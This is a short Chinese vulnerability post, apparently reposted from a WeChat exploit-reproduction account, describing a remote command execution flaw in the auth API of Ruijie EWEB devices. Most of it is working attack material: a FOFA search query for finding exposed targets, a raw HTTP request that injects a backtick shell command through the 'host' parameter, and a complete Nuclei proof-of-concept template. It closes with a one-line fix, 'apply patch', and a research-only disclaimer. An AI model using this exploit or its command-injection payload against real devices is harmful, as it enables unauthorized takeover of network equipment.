1. 锐捷网络-EWEB系统简介
锐捷网络-EWEB系统
2.漏洞描述
锐捷网络-EWEB系统auth接口存在远程命令执行漏洞
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
锐捷网络-EWEB系统
4.fofa查询语句
body="cgi-bin/luci" && body="#f47f3e"
5.漏洞复现
POST /cgi-bin/luci/api/auth HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo Hello tt!>tt.txt`"}}
漏洞数据包:
6.POC&EXP
id: Ruijie-EWEB-auth-REC
info:
name: auth接口存在RCE漏洞。
author: tt
severity: high
metadata:
fofa-query: body="cgi-bin/luci" && body="#f47f3e"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /cgi-bin/luci/api/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo Hello tt!>{{filename}}.txt`"}}
- |
GET /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"tt!")
7.整改意见
打补丁
原文始发于微信公众号(南风漏洞复现文库):锐捷网络-EWEB系统auth接口存在远程命令执行漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论